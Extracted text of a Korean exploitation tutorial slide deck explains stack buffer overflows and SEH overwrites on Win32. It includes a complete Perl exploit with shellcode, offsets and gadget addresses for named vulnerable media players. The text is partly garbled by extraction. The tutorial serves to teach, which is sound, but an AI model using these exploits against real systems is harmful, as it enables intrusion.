This talk explores the challenges of bringing modelling rigour to the business and strategy levels, and talking to your non-technical counterparts in the process.
All you need to know about Spring Boot and GraalVM
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
1. System Hacking & Reverse Engineering
documented by h2spice
h2spice@gmail.com
[ Buffer Overflow - Overwrite EIP ]
2. Who am I
Sanghwan,Ahn (h2spice)
Works for LINE.Corp
Carrying out research on the vulnerability (exploitation,hunt,analysis)
3. 시스템 해킹 / 리버싱
Buffer Overflow
취약점 원리
Stack Overflow
Heap Overflow
Format String Bug
Heap Overflow
Use After Free
Overwriting RET
Overwriting SEH
익스플로잇(Win32/*NIX/ARM)
Egg Hunting
RTL
ROP
Heap Spraying
커리큘럼 소개
취약점 / 악성코드 분석
악성코드 분석
Software on X86
버그 헌팅
X86 ARM
Mobile
취약점 분석
소스코드 분석
퍼징
CVE-XXXX-XXXX
Exploit-DB
Inj3ct0r - 1337day
리버스 엔지니어링
iOS
Android
Overwriting .dtors
Overwriting GOT
4. 목차
커리큘럼 소개
Track3 - Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP
Heap Spray
Track3-2 *NIX
Overwrite RET
RTL
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
RTL
ROP
6. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
7. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
8. What is the Exploitation ?
익스플로잇 (Exploitation) 이란, 컴퓨터 의 소프트웨어 나 하드웨어
및 컴퓨터 고나련 전자 제품의 버그, 보안 취약점등 설계상의 결함을
이용해 공격자의 의도된 동작을 수행하도록 만들어진 절차나 일련의
명령, 스크립트, 프로그램 또는 특정한 데이터 조각을 말하며, 이러한
것들을 사용한 공격 행위를 의미
공격자가 타깃의 흐름 제어가 (Control Flow) 가능 할 때 부터 진행
보통 특정 버그를 이용하여 취약성을 유발하는 코드와 특정 보안 메커
니즘을 우회하는 코드, 악의적인 동작을 수행하는 코드로 구성
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
9. Overwrite RET (Retrun Address)
스택 버퍼 오버플로우 (Stack Buffer Overflow) 취약성을 이용하여 스
택 영역에 할당된 버퍼의 크기를 초과하는 데이터(공격코드 포함)를 기
록하여 저장된 복구 주소(Return Address)를 공격코드의 주소로 변경
함으로써 임의의 코드를 실행
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
10. How do you fly to shellcode ?
셸 코드(Shell Code)로 이동하는 방법
jmp(or call) [register]
: 셸 코드를 가리키는 주소를 레지스터에 넣고, 그 주소를 Return Address에 넣어 셸 코드를 로드할 수 있다.
pop return
: 셸 코드를 가리키는 주소를 스택에 넣어 놓고 pop/ret 또는 pop/pop/ret (해당 명령이 스택의 어느 위치에 존재하느냐
에 따라 pop의 개수가 달라진다)와 같은 명령을 EIP로 주입함으로써 쉘 코드를 로드 할 수 있다.
push return
: ‘jmp(or call) [register]’ 와 유사하다. 만약 공격자가 어디에서도 ‘jmp(or call) [register]’ 기계어를 찾을 수 없다면 스택
에 주소를 푸쉬(push)하고 ret 처리하여 셸 코드를 로드할 수 있다.
jmp [register + offset]
: 셸 코드를 포함하는 버퍼를 가르키는 레지스터가 있지만, 그것이 셸 코드의 시작 위치를 가리키지 않는다면, 공격자는 레
지스터로 가기 위해 필요한 바이트의 덧셈 연산을 하고 jmp [register + offset] 기계어를 통해 셸 코드를 로드할 수 있다.
SEH (Error Handler)
: 모든 소프트웨어는 OS에 의해 제공되는 예외 처리기를 기본적으로 가지고 있다. 그래서 만약 소프트웨어 자신이 예외
처리를 사용하지 않는다 하더라도, 공격자는 SEH 핸들러를 자신이 원하는 주소로 덮어 씌워, 셸 코드를 로드할 수 있다.
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
11. Overwrite RET
arg2
arg1
&ret (saved eip)
saved ebp
char buf[8]
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
12. Overwrite RET
arg2
arg1
&ret (saved eip)
saved ebp
n w o
char buf[8]
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing Direction
l l e H
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
13. Overwrite RET
arg2
arg1
A A A A
A A A A
&ret (saved eip)
saved ebp
A A A A
A A A A
A A A A
char buf[8]
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing Direction
A A A A
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
14. Overwrite RET
arg2
arg1
A A A A
Target Address (to Shell Code)
&ret (saved eip)
saved ebp
A A A A
A A A A
A A A A
char buf[8]
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing Direction
A A A A
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
15. Overwrite RET
arg2
arg1
&buf(included &ret (saved shell eip)
code)
Padding
saved ebp
C o d e
char buf[8]
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing Direction
S h e l l
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
16. Exercise Time :D
Target Info
Win32
Easy RM to MP3 Converter
v.2.7.3.700
Download Link is
(http://outofcontrol.co.kr/vulnApp/EasyRM.zip)
Vulnerability Type
Buffer Overflow (Stack Based)
by Parsing Playlist
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
17. Exercise Time :D
Tip
Generate Pattern by using mona plugin
(!mona pattern_create 30000)
nop sleds (0x90 * N)
Shell code (windows/exec calc.exe)
"xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" .
"x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" .
"x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" .
"x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" .
"x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" .
"xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" .
"xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" .
"x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" .
"xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" .
"xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" .
"x7fxe8x7bxca";
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
18. Exercise Time :D
Exploit Info
.m3u Playlist File Format
length of junk data is 26037
gadget is 0x7608fcfe (From jmp esp MSRMCcodec02.dll)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
19. Exercise Time :D
Exploit Code (exploit.pl)
my $file= "exploit.m3u";
my $junk= "A" x 26037;
my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $shellcode = "x90" x 25;
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" .
"x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" .
"x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" .
"x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" .
"x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" .
"xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" .
"xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" .
"x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" .
"xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" .
"xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" .
"x7fxe8x7bxca";
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfullyn";
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
20. Overwrite SEH (Error Handler)
구조적 예외 처리 핸들러(SEH:Structured Exception Handler)
윈도우에서 제공하는 예외 처리 방식
exeception handler 사용
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
21. Exception Handler
예외 핸들러(Exception Handler)는 애플리케이션의 예외 발생에
대처하는 목적을 가진 애플리케이션 내부 조각들을 의미한다
(일반적인 예외 처리 메커니즘은 아래 참고)
try {
// run stuff. if an exception occurs, go to <catch> code
}
catch {
// run stuff when exception occurs
}
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
22. Exception Handler
high address
Exception Handler
Arguments
Return Address
Stack Frame Pointer
Local Variables
(buffer area)
low address
try {
// run stuff. if an exception occurs,
go to <catch> code
}
catch {
// run stuff when exception occurs
}
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
23. Exception Handler
예외 핸들러 (Exception Handler) 는 두가지 포인터를 가진다
다음 Exception Handler 구조체를 가리키는 포인터
예외 핸들러의 실제 주소를 가리키는 포인터 (SE Handler)
high address
Exception Handler
Arguments
Return Address
Stack Frame Pointer
Local Variables
(buffer area)
low address
Exception Handler
Next Exception Handler Address
Exception Handler Address
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
25. high address
pointer to next SEH record
pointer to SEH Handler
Arguments
Return Address
Stack Frame Pointer
Local Variables
(buffer area)
low address
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing Direction Track3. Exploitation Overwrite SEH
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
26. Track3. Exploitation Overwrite SEH
high address
pointer to next SEH record
pointer to SEH Handler
Arguments
Return Address
Stack Frame Pointer
Local Variables
(buffer area)
low address
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing Direction
A A A A
A A A A
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
27. Track3. Exploitation Overwrite SEH
high address
A A A A
pointer to next SEH record
pointer to SEH Handler
A A A A
Arguments
Return Address
Stack Frame Pointer
Local Variables
(buffer area)
A A A A
A A A A
A A A A
low address
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing Direction
A A A A
A A A A
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
28. Track3. Exploitation Overwrite SEH
high address
A A A A
pointer to next SEH record
pointer to SEH Handler
A A A A
Arguments
Return Address
Stack Frame Pointer
Local Variables
(buffer area)
A A A A
A A A A
A A A A
low address
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing Direction
A A A A
A A A A
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
29. Overwrite SEH
high address
jmp to shellcode
pointer to next SEH record
pointer to SEH Handler
pop/pop/ret
Arguments
Return Address
Stack Frame Pointer
Local Variables
(buffer area)
A A A A
Padding
C o d e
A A A A
low address
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing Direction
A A A A
S h e l l
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
30. Exercise Time :D
Target Info
Win32
FreeAMP Audio Player
v.2.0.7
Download Link is
(http://outofcontrol.co.kr/vulnApp/FreeAmp.zip)
Vulnerability Type
Buffer Overflow (Stack Based)
by Parsing Playlist
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
32. Exercise Time :D
Exploit Info
.pls Playlist File Format
length of junk data is 893
gadget is 0x004027BF (Pop/Pop/Ret From freeamp.exe)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)